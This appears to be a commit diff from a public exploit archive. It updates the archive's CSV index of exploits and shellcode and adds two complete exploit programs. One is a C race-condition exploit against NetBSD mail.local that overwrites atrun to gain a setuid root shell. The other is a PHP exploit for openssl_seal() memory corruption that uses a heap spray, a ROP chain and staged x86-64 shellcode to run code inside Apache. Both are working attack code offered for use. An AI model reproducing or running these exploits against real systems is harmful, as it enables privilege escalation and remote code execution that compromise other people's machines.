40054,platforms/linux/local/40054.c,"Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0
40054,platforms/linux/local/40054.c,"Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation",2016-07-04,halfdog,linux,local,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
@ -36269,7 +36269,7 @@ id,file,description,date,author,platform,type,port
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
@ -36277,10 +36277,10 @@ id,file,description,date,author,platform,type,port
40113,platforms/linux/remote/40113.txt,"OpenSSHD <= 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22
40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
@ -36297,3 +36297,5 @@ id,file,description,date,author,platform,type,port
40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow Exploit (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69
40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes)",2016-07-21,CripSlick,lin_x86-64,shellcode,0
40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
40142,platforms/php/remote/40142.php,"Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0

Can't render this file because it is too large.

220
platforms/bsd/local/40141.c Executable file
View file

@ -0,0 +1,220 @@
// Source: http://akat1.pl/?id=2
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <sys/wait.h>
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"
static int
overwrite_atrun(void)
{
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;
fh = fopen(ATRUNPATH, "wb");
if (fh == NULL) {
rv = -1;
goto out;
}
size = strlen(script);
if (size != fwrite(script, 1, strlen(script), fh)) {
rv = -1;
goto out;
}
out:
if (fh != NULL && fclose(fh) != 0)
rv = -1;
return rv;
}
static int
copy_file(const char *from, const char *dest, int create)
{
char buf[1024];
FILE *in = NULL, *out = NULL;
size_t size;
int rv = 0, fd;
in = fopen(from, "rb");
if (create == 0)
out = fopen(dest, "wb");
else {
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR |
S_IWUSR);
if (fd == -1) {
rv = -1;
goto out;
}
out = fdopen(fd, "wb");
}
if (in == NULL || out == NULL) {
rv = -1;
goto out;
}
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
if (fwrite(&buf, 1, size, in) != 0) {
rv = -1;
goto out;
}
}
out:
if (in != NULL && fclose(in) != 0)
rv = -1;
if (out != NULL && fclose(out) != 0)
rv = -1;
return rv;
}
int
main()
{
pid_t pid;
uid_t uid;
struct stat sb;
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
umask(0077);
login = getlogin();
if (login == NULL)
err(EXIT_FAILURE, "who are you?");
uid = getuid();
asprintf(&mailbox, MAILDIR "/%s", login);
if (mailbox == NULL)
err(EXIT_FAILURE, NULL);
if (access(mailbox, F_OK) != -1) {
/* backup mailbox */
asprintf(&mailbox_backup, "/tmp/%s", login);
if (mailbox_backup == NULL)
err(EXIT_FAILURE, NULL);
}
if (mailbox_backup != NULL) {
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox,
mailbox_backup);
if (copy_file(mailbox, mailbox_backup, 1))
err(EXIT_FAILURE, "[-] failed");
}
/* backup atrun(1) */
atrun_backup = strdup("/tmp/atrun");
if (atrun_backup == NULL)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH,
atrun_backup);
if (copy_file(ATRUNPATH, atrun_backup, 1))
err(EXIT_FAILURE, "[-] failed");
/* win the race */
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
switch (pid = fork()) {
case -1:
err(EXIT_FAILURE, NULL);
/* NOTREACHED */
case 0:
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
"2> /dev/null", login);
for(;;)
system(buf);
/* NOTREACHED */
default:
umask(0022);
for(;;) {
int fd;
unlink(mailbox);
symlink(ATRUNPATH, mailbox);
sync();
unlink(mailbox);
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
close(fd);
sync();
if (lstat(ATRUNPATH, &sb) == 0) {
if (sb.st_uid == uid) {
kill(pid, 9);
fprintf(stderr, "[+] won race!\n");
break;
}
}
}
break;
}
(void)waitpid(pid, NULL, 0);
if (mailbox_backup != NULL) {
/* restore mailbox */
fprintf(stderr, "[+] restore mailbox %s to %s\n",
mailbox_backup, mailbox);
if (copy_file(mailbox_backup, mailbox, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(mailbox_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
}
/* overwrite atrun */
fprintf(stderr, "[+] overwriting atrun(1)\n");
if (chmod(ATRUNPATH, 0755) != 0)
err(EXIT_FAILURE, NULL);
if (overwrite_atrun())
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
for(;;sleep(1)) {
if (access("/tmp/ksh", F_OK) != -1)
break;
}
/* restore atrun */
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup,
ATRUNPATH);
if (copy_file(atrun_backup, ATRUNPATH, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(atrun_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
if (chmod(ATRUNPATH, 0555) != 0)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
"ownership.\n");
fprintf(stderr, "Enjoy your shell:\n");
execl("/tmp/ksh", "ksh", NULL);
return 0;
}

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
@ -5,6 +6,7 @@ A vulnerability has been discovered in the Linux kernel which can be exploited u
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
@ -5,7 +6,7 @@ A vulnerability has been discovered in the Linux kernel which can be exploited u
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]

205
platforms/php/remote/40142.php Executable file
View file

@ -0,0 +1,205 @@
<?php
// Source: http://akat1.pl/?id=1
function get_maps() {
$fh = fopen("/proc/self/maps", "r");
$maps = fread($fh, 331337);
fclose($fh);
return explode("\n", $maps);
}
function find_map($sym) {
$addr = 0;
foreach(get_maps() as $record)
if (strstr($record, $sym) && strstr($record, "r-xp")) {
$addr = hexdec(explode('-', $record)[0]);
break;
}
if ($addr == 0)
die("[-] can't find $sym base, you need an information leak :[");
return $addr;
}
function fill_buffer($offset, $content) {
global $buffer;
for ($i = 0; $i < strlen($content); $i++)
$buffer[$offset + $i] = $content[$i];
return;
}
$pre = get_maps();
$buffer = str_repeat("\x00", 0xff0000);
$post = get_maps();
$tmp = array_diff($post, $pre);
if (count($tmp) != 1)
die('[-] you need an information leak :[');
$buffer_base = hexdec(explode('-',array_values($tmp)[0])[0]);
$addr = $buffer_base+0x14; /* align to string */
echo "[+] buffer string @ 0x".dechex($addr)."\n";
$align = 0xff;
$addr += $align;
echo "[+] faking EVP_PKEY @ 0x".dechex($addr)."\n";
echo "[+] faking ASN @ 0x".dechex($addr)."\n";
fill_buffer($align + 12, pack('P', $addr));
$libphp_base = find_map("libphp7");
echo "[+] libphp7 base @ 0x".dechex($libphp_base)."\n";
/* pop x ; pop rsp ; ret - stack pivot */
$rop_addr = $libphp_base + 0x00000000004a79c3;
echo "[+] faking pkey_free @ 0x".dechex($addr+0xa0-4)." = ".dechex($rop_addr)."\n";
fill_buffer($align + 0xa0 - 4, pack('P', $rop_addr));
/* pop rbp ; pop rbp ; ret - clean up the stack after pivoting */
$rop_addr = $libphp_base + 0x000000000041d583;
fill_buffer($align - 4, pack('P', $rop_addr));
$libc_base = find_map("libc-");
echo "[+] libc base @ 0x".dechex($libc_base)."\n";
$mprotect_offset = 0xf4a20;
$mprotect_addr = $libc_base + $mprotect_offset;
echo "[+] mprotect @ 0x".dechex($mprotect_addr)."\n";
$mmap_offset = 0xf49c0;
$mmap_addr = $libc_base + $mmap_offset;
echo "[+] mmap @ 0x".dechex($mmap_addr)."\n";
$apache2_base = find_map("/usr/sbin/apache2");
echo "[+] apache2 base @ 0x".dechex($apache2_base)."\n";
$ap_rprintf_offset = 0x429c0;
$ap_rprintf_addr = $apache2_base + $ap_rprintf_offset;
echo "[+] ap_rprintf @ 0x".dechex($ap_rprintf_addr)."\n";
$ap_hook_quick_handler_offset = 0x56c00;
$ap_hook_quick_handler_addr = $apache2_base + $ap_hook_quick_handler_offset;
echo "[+] ap_hook_quick_handler @ 0x".dechex($ap_hook_quick_handler_addr)."\n";
echo "[+] building ropchain\n";
$rop_chain =
pack('P', $libphp_base + 0x00000000000ea107) . // pop rdx ; ret
pack('P', 0x0000000000000007) . // rdx = 7
pack('P', $libphp_base + 0x00000000000e69bd) . // pop rsi ; ret
pack('P', 0x0000000000004000) . // rsi = 0x1000
pack('P', $libphp_base + 0x00000000000e5fd8) . // pop rdi ; ret
pack('P', $addr ^ ($addr & 0xffff)) . // rdi = page aligned addr
pack('P', $mprotect_addr) . // mprotect addr
pack('P', ($addr ^ ($addr & 0xffff)) | 0x10ff); // return to shellcode_stage1
fill_buffer($align + 0x14, $rop_chain);
$shellcode_stage1 = str_repeat("\x90", 512) .
"\x48\xb8" . pack('P', $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax
"\x49\xb8" . pack('P', 0x1000) . // handler size
"\x48\xb9" . pack('P', $buffer_base + 0x3018) . // handler
"\x48\xba" . pack('P', $ap_hook_quick_handler_addr) . // movabs ap_hook_quick_handler, %rdx
"\x48\xbe" . pack('P', 0) . // UNUSED
"\x48\xbf" . pack('P', $mmap_addr) . // movabs mmap,%rdi
"\xff\xd0" . // callq %rax
"\xb8\x27\x00\x00\x00" . // mov $0x27,%eax - getpid syscall
"\x0f\x05" . // syscall
"\xbe\x1b\x00\x00\x00" . // mov $0xd,%esi - SIGPROF
"\x89\xc7" . // mov %eax,%edi - pid
"\xb8\x3e\x00\x00\x00" . // mov $0x3e,%eax - kill syscall
"\x0f\x05"; // syscall
fill_buffer(0x1000, $shellcode_stage1);
$shellcode_stage2 = str_repeat("\x90", 512) .
"\x55" . // push %rbp
"\x48\x89\xe5" . // mov %rsp,%rbp
"\x48\x83\xec\x40" . // sub $0x40,%rsp
"\x48\x89\x7d\xe8" . // mov %rdi,-0x18(%rbp)
"\x48\x89\x75\xe0" . // mov %rsi,-0x20(%rbp)
"\x48\x89\x55\xd8" . // mov %rdx,-0x28(%rbp)
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
"\x4c\x89\x45\xc8" . // mov %r8,-0x38(%rbp)
"\x48\x8b\x45\xe8" . // mov -0x18(%rbp),%rax
"\x41\xb9\x00\x00\x00\x00" . // mov $0x0,%r9d
"\x41\xb8\xff\xff\xff\xff" . // mov $0xffffffff,%r8d
"\xb9\x22\x00\x00\x00" . // mov $0x22,%ecx
"\xba\x07\x00\x00\x00" . // mov $0x7,%edx
"\xbe\x00\x20\x00\x00" . // mov $0x2000,%esi
"\xbf\x00\x00\x00\x00" . // mov $0x0,%edi
"\xff\xd0" . // callq *%rax
"\x48\x89\x45\xf0" . // mov %rax,-0x10(%rbp)
"\x48\x8b\x45\xf0" . // mov -0x10(%rbp),%rax
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
"\xeb\x1d" . // jmp 0x40063d <shellcode+0x6d>
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
"\x48\x8d\x50\x01" . // lea 0x1(%rax),%rdx
"\x48\x89\x55\xf8" . // mov %rdx,-0x8(%rbp)
"\x48\x8b\x55\xd0" . // mov -0x30(%rbp),%rdx
"\x48\x8d\x4a\x01" . // lea 0x1(%rdx),%rcx
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
"\x0f\xb6\x12" . // movzbl (%rdx),%edx
"\x88\x10" . // mov %dl,(%rax)
"\x48\x8b\x45\xc8" . // mov -0x38(%rbp),%rax
"\x48\x8d\x50\xff" . // lea -0x1(%rax),%rdx
"\x48\x89\x55\xc8" . // mov %rdx,-0x38(%rbp)
"\x48\x85\xc0" . // test %rax,%rax
"\x75\xd2" . // jne 0x400620 <shellcode+0x50>
"\x48\x8b\x7d\xf0" . // mov -0x10(%rbp),%rdi
"\x48\x8b\x45\xd8" . // mov -0x28(%rbp),%rax
"\xb9\xf6\xff\xff\xff" . // mov $0xfffffff6,%ecx
"\xba\x00\x00\x00\x00" . // mov $0x0,%edx
"\xbe\x00\x00\x00\x00" . // mov $0x0,%esi
"\xff\xd0" . // callq *%rax
"\xc9" . // leaveq
"\xc3"; // retq
fill_buffer(0x2000, $shellcode_stage2);
$handler =
"\x55" . // push %rbp
"\x48\x89\xe5" . // mov %rsp,%rbp
"\x48\x83\xec\x30" . // sub $0x30,%rsp
"\x48\x89\x7d\xd8" . // mov %rdi,-0x28(%rbp)
"\x48\xb8" . pack('P', $ap_rprintf_addr) . // movabs $0xdeadbabefeedcafe,%rax
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
"\x48\xb8" . "Hello Wo" . // movabs CONTENT,%rax
"\x48\x89\x45\xe0" . // mov %rax,-0x20(%rbp)
"\x48\xb8" . "rld!\n\x00\x00\x00" . // movabs CONTENT,%rax
"\x48\x89\x45\xe8" . // mov %rax,-0x20(%rbp)
"\x48\x8d\x4d\xe0" . // lea -0x20(%rbp),%rcx
"\x48\x8b\x55\xd8" . // mov -0x28(%rbp),%rdx
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
"\x48\x89\xce" . // mov %rcx,%rsi
"\x48\x89\xd7" . // mov %rdx,%rdi
"\xff\xd0" . // callq *%rax
"\xb8\x00\x00\x00\x00" . // mov $0x0,%eax
"\xc9" . // leaveq
"\xc3"; // retq
fill_buffer(0x3000, $handler);
$addr = pack('P', $addr);
$memory = str_repeat($addr,321);
$pem = "
-----BEGIN PUBLIC KEY-----
MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ==
-----END PUBLIC KEY-----"; /* Random RSA key */
$a = array_fill(0,321,0);
/* place valid keys at the beginning */
$k = openssl_pkey_get_public($pem);
$a[0] = $k; $a[1] = $k; $a[2] = $k;
echo "[+] spraying heap\n";
$x = array();
for ($i = 0 ; $i < 20000 ; $i++) {
$x[$i] = str_repeat($memory, 1);
}
for ($i = 0 ; $i < 20000 ; $i++) {
unset($x[$i]);
}
unset($x);
echo "[+] triggering openssl_seal()...\n";
@openssl_seal($_, $_, $_, $a);
echo "[-] failed ;[\n";